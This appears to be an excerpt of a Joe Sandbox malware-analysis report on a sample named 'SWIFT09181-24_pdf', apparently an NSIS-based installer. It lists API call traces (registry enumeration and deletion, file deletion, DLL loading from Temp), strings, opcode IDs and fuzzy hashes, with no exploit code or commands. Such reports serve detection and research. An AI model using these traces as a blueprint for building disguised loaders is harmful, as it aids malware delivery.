                                                                                                                                    • Source File: 00000000.00000002.2617234621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2617219411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617290785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617473125.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                    • String ID: verifying installer: %d%%
                                                                                                                                    • API String ID: 1451636040-82062127
                                                                                                                                    • Opcode ID: afeae77a0bcb9b30cd304cf262a1d5eea60d0cf7f315b1f8058d570c1e4d3d01
                                                                                                                                    • Instruction ID: 97815700fdd75a8fa64cd4b2fc5eb6b0a03b286ae4c71c47182b2025913274cc
                                                                                                                                    • Opcode Fuzzy Hash: afeae77a0bcb9b30cd304cf262a1d5eea60d0cf7f315b1f8058d570c1e4d3d01
                                                                                                                                    • Instruction Fuzzy Hash: 1801447060020DBFEF249F61DE49FEA3B69AB04304F008039FA45B91D0DBB889558F58
                                                                                                                                    APIs
                                                                                                                                    • GetDC.USER32(?), ref: 00401D59
                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D66
                                                                                                                                    • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D75
                                                                                                                                    • ReleaseDC.USER32(?,00000000), ref: 00401D86
                                                                                                                                    • CreateFontIndirectW.GDI32(0040CDF8), ref: 00401DD1
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2617234621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2617219411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617290785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617473125.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                    • String ID: Calibri
                                                                                                                                    • API String ID: 3808545654-1409258342
                                                                                                                                    • Opcode ID: 19b2d30e00b512fe454d1cbfc28b544df66b8b4a94fa99dfbc87282a1f03fb40
                                                                                                                                    • Instruction ID: 434465042c296b11fe85f1af20959402fdd5081aa20827676714b0861cca44ca
                                                                                                                                    • Opcode Fuzzy Hash: 19b2d30e00b512fe454d1cbfc28b544df66b8b4a94fa99dfbc87282a1f03fb40
                                                                                                                                    • Instruction Fuzzy Hash: C301A231544640EFE7015BB0EF8AB9A3F74AB66301F208579E581B62E2C9B800559BAE
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 10002572
                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 100025AD
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2635351082.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2635332703.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2635371796.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2635394979.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_10000000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Global$Free$Alloc
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1780285237-0
                                                                                                                                    • Opcode ID: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
                                                                                                                                    • Instruction ID: 76257f5bf6759f365bfcd452de7d39bb0b2322773c3eba187a8a795e141f7608
                                                                                                                                    • Opcode Fuzzy Hash: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
                                                                                                                                    • Instruction Fuzzy Hash: 6831DE71504A21EFF321CF14CCA8E2B7BF8FB853D2F114529FA40961A8CB319851DB69
                                                                                                                                    APIs
                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402894
                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004028B0
                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 004028E9
                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 004028FC
                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00402914
                                                                                                                                    • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402928
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2617234621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2617219411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617290785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617473125.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2667972263-0
                                                                                                                                    • Opcode ID: 93673c575230451abb0308dee03947b91720819ab8eaafde2c5768f7b1eff422
                                                                                                                                    • Instruction ID: bba7bc1bbfa323a43f965ccea5c6d76089a10f976336bb633e0bf1cd6394a54a
                                                                                                                                    • Opcode Fuzzy Hash: 93673c575230451abb0308dee03947b91720819ab8eaafde2c5768f7b1eff422
                                                                                                                                    • Instruction Fuzzy Hash: E1219E72800114BBDF216FA5CE49D9E7EB9EF09324F24023AF550762E1C7795E41DBA8
                                                                                                                                    APIs
                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsw967F.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsw967F.tmp\System.dll,00000400,?,?,00000021), ref: 00402583
                                                                                                                                    • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsw967F.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsw967F.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsw967F.tmp\System.dll,00000400,?,?,00000021), ref: 0040258E
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2617234621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2617219411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617290785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617473125.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ByteCharMultiWidelstrlen
                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\nsw967F.tmp$C:\Users\user\AppData\Local\Temp\nsw967F.tmp\System.dll
                                                                                                                                    • API String ID: 3109718747-942181086
                                                                                                                                    • Opcode ID: 3d2fa72be5f195c02a17edb7a7abc67028f461df84df2576b51681d351cbf091
                                                                                                                                    • Instruction ID: 733a5b8a3421de7103486a8e2fd1e7248c9e7ae9f3a69bb90da27b1d5488d101
                                                                                                                                    • Opcode Fuzzy Hash: 3d2fa72be5f195c02a17edb7a7abc67028f461df84df2576b51681d351cbf091
                                                                                                                                    • Instruction Fuzzy Hash: E011EB71A01205BBDB10AF718F49A9F3265DF44754F24403BF501F61C2EAFC9D91566D
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2635351082.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2635332703.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2635371796.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2635394979.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_10000000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FreeGlobal
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2979337801-0
                                                                                                                                    • Opcode ID: 2b8b4b1e7525df0b70178d99aec232a76bf74dae3dcdb19d2f86b3abb44108d8
                                                                                                                                    • Instruction ID: 56de187798276af1e94fdae5c91d23c4da0ac5596926d43ddda2a484f8c4ba85
                                                                                                                                    • Opcode Fuzzy Hash: 2b8b4b1e7525df0b70178d99aec232a76bf74dae3dcdb19d2f86b3abb44108d8
                                                                                                                                    • Instruction Fuzzy Hash: 82511336E06115ABFB14DFA488908EEBBF5FF863D0F16406AE801B315DD6706F809792
                                                                                                                                    APIs
                                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402C20
                                                                                                                                    • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402C5C
                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00402C65
                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00402C8A
                                                                                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402CA8
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2617234621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2617219411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617290785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617473125.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Close$DeleteEnumOpen
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1912718029-0
                                                                                                                                    • Opcode ID: 9537b7928c54e317f26638c763091e9991b3818ca9768273474462c6ff6c3974
                                                                                                                                    • Instruction ID: 923876515d334741f157c0c1a16b9ae25b0374e488e2a62f99a19aca1c1d50f8
                                                                                                                                    • Opcode Fuzzy Hash: 9537b7928c54e317f26638c763091e9991b3818ca9768273474462c6ff6c3974
                                                                                                                                    • Instruction Fuzzy Hash: 4B116A71504119BFEF10AF90DF8CEAE7B79FB54384B10003AF905A11A0D7B49E55AA28
                                                                                                                                    APIs
                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002148,?,00000808), ref: 10001617
                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002148,?,00000808), ref: 1000161E
                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002148,?,00000808), ref: 10001632
                                                                                                                                    • GetProcAddress.KERNEL32(10002148,00000000), ref: 10001639
                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 10001642
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2635351082.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2635332703.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2635371796.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2635394979.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_10000000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1148316912-0
                                                                                                                                    • Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                                                                                                    • Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
                                                                                                                                    • Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                                                                                                    • Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1
                                                                                                                                    APIs
                                                                                                                                    • GetDlgItem.USER32(?,?), ref: 00401D00
                                                                                                                                    • GetClientRect.USER32(00000000,?), ref: 00401D0D
                                                                                                                                    • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D2E
                                                                                                                                    • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D3C
                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00401D4B
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2617234621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2617219411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617290785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617473125.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1849352358-0
                                                                                                                                    • Opcode ID: 8e0fabd36c2f6d3e7eeae66a254b8168ed1f2a4b1cc3225a820133a00fa4cc9f
                                                                                                                                    • Instruction ID: e4f3909cb7298d305a77c10ae8325f91f27f48586481a57425ae6c27891e8aa9
                                                                                                                                    • Opcode Fuzzy Hash: 8e0fabd36c2f6d3e7eeae66a254b8168ed1f2a4b1cc3225a820133a00fa4cc9f
                                                                                                                                    • Instruction Fuzzy Hash: 8AF0F472600504AFDB01DBE4DE88CEEBBBDEB48311B104476F501F51A1CA74DD018B38
                                                                                                                                    APIs
                                                                                                                                    • lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404A11
                                                                                                                                    • wsprintfW.USER32 ref: 00404A1A
                                                                                                                                    • SetDlgItemTextW.USER32(?,0042D268), ref: 00404A2D
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2617234621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2617219411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617290785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617473125.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ItemTextlstrlenwsprintf
                                                                                                                                    • String ID: %u.%u%s%s
                                                                                                                                    • API String ID: 3540041739-3551169577
                                                                                                                                    • Opcode ID: 7f196247ffa4f5a533f026148308de82019fe3f3f4a3a426db09a444c3bfa401
                                                                                                                                    • Instruction ID: def2e14d0b5e9bf745060eb8ff4f21dbd1799345f736686a8e00f38c04d15d9e
                                                                                                                                    • Opcode Fuzzy Hash: 7f196247ffa4f5a533f026148308de82019fe3f3f4a3a426db09a444c3bfa401
                                                                                                                                    • Instruction Fuzzy Hash: 3811EBB3A441287BDB10957D9C46EAF329C9B85374F250237FA65F31D1D978CC2182E8
                                                                                                                                    APIs
                                                                                                                                    • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C3F
                                                                                                                                    • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C57
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2617234621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2617219411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617290785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617473125.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$Timeout
                                                                                                                                    • String ID: !
                                                                                                                                    • API String ID: 1777923405-2657877971
                                                                                                                                    • Opcode ID: bb3cfb28f78b001f2c6e024d0600213de5f72616f9f3d873aed837dd9dfd9417
                                                                                                                                    • Instruction ID: e3aefc4fd96fc6be6e01b9b250019d2d880820bae5141952ee5ed295407643d5
                                                                                                                                    • Opcode Fuzzy Hash: bb3cfb28f78b001f2c6e024d0600213de5f72616f9f3d873aed837dd9dfd9417
                                                                                                                                    • Instruction Fuzzy Hash: DA219071940209BEEF01AFB4CE4AABE7B75EB44344F10403EF601B61D1D6B89A409B68
                                                                                                                                    APIs
                                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,00000002,Call,?,00406195,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405F4C
                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,00406195,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405F6D
                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,00406195,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405F90
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2617234621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2617219411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617290785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617473125.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CloseOpenQueryValue
                                                                                                                                    • String ID: Call
                                                                                                                                    • API String ID: 3677997916-1824292864
                                                                                                                                    • Opcode ID: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
                                                                                                                                    • Instruction ID: 7b18913d2a4f7d1a63d21b64be8b0843a819b9ea39c2317e7442ba644687e02f
                                                                                                                                    • Opcode Fuzzy Hash: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
                                                                                                                                    • Instruction Fuzzy Hash: 1801483110060AAECB218F66ED08EAB3BA8EF94350F01402AFD44D2260D734D964CBA5
                                                                                                                                    APIs
                                                                                                                                    • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040328D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00405A0F
                                                                                                                                    • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040328D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00405A19
                                                                                                                                    • lstrcatW.KERNEL32(?,0040A014), ref: 00405A2B
                                                                                                                                    Strings
                                                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A09
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2617234621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2617219411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617290785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617473125.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CharPrevlstrcatlstrlen
                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                    • API String ID: 2659869361-3081826266
                                                                                                                                    • Opcode ID: 69ce20dac70bd98cff0fbc611a97eee619d910519d07cd3d76554ab653056bec
                                                                                                                                    • Instruction ID: 6c4fcacab342d11fcc3e0291a3358bee332e4b98312e181ff459d3a43eef6c86
                                                                                                                                    • Opcode Fuzzy Hash: 69ce20dac70bd98cff0fbc611a97eee619d910519d07cd3d76554ab653056bec
                                                                                                                                    • Instruction Fuzzy Hash: E4D0A771101D306AC211EB548C04DDF72ACAE45344381007BF502B30E1CB7C1D618BFE
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 004051B4: lstrlenW.KERNEL32(0042C248,00000000,0041D820,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
